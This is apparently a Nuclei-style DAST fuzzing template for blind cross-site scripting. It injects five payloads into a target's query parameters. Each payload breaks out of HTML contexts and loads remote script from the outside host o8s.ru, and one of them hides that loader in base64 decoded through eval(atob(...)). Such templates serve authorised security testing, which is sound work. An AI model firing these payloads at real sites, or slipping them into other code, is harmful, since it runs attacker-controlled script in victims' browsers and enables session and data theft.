id: fuzz-blind-xss-2

info:
  name: Blind Cross Site Scripting
  author: otterly
  severity: medium
  tags: xss,bxss,dast

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    payloads:
      payload:
        - "`'\"><script src=//o8s.ru></script>"
        - "`'\"></script></title></textarea><script src=//o8s.ru></script>"
        - "--></tiTle></stYle></texTarea></scrIpt>\"//'//><scrIpt src=\"https://o8s.ru\"></scrIpt>"
        - "`'\"></Title/</StYle/</TeXtarEa/</ScRipt/</NoScRiPt/</SeLeCt/</OpTiOn/</Svg/''\"><svg/onload=javascript:eval(atob('dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbzhzLnJ1Ijtkb2N1bWVudC5ib2R5LmFwcGVuZChhKTs='))//"
        - "/*'/*`/*--></noscript></title></textarea></style></template></noembed></script>\"//'//><scrIpt src=\"https://o8s.ru\"></scrIpt>"

    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{payload}}"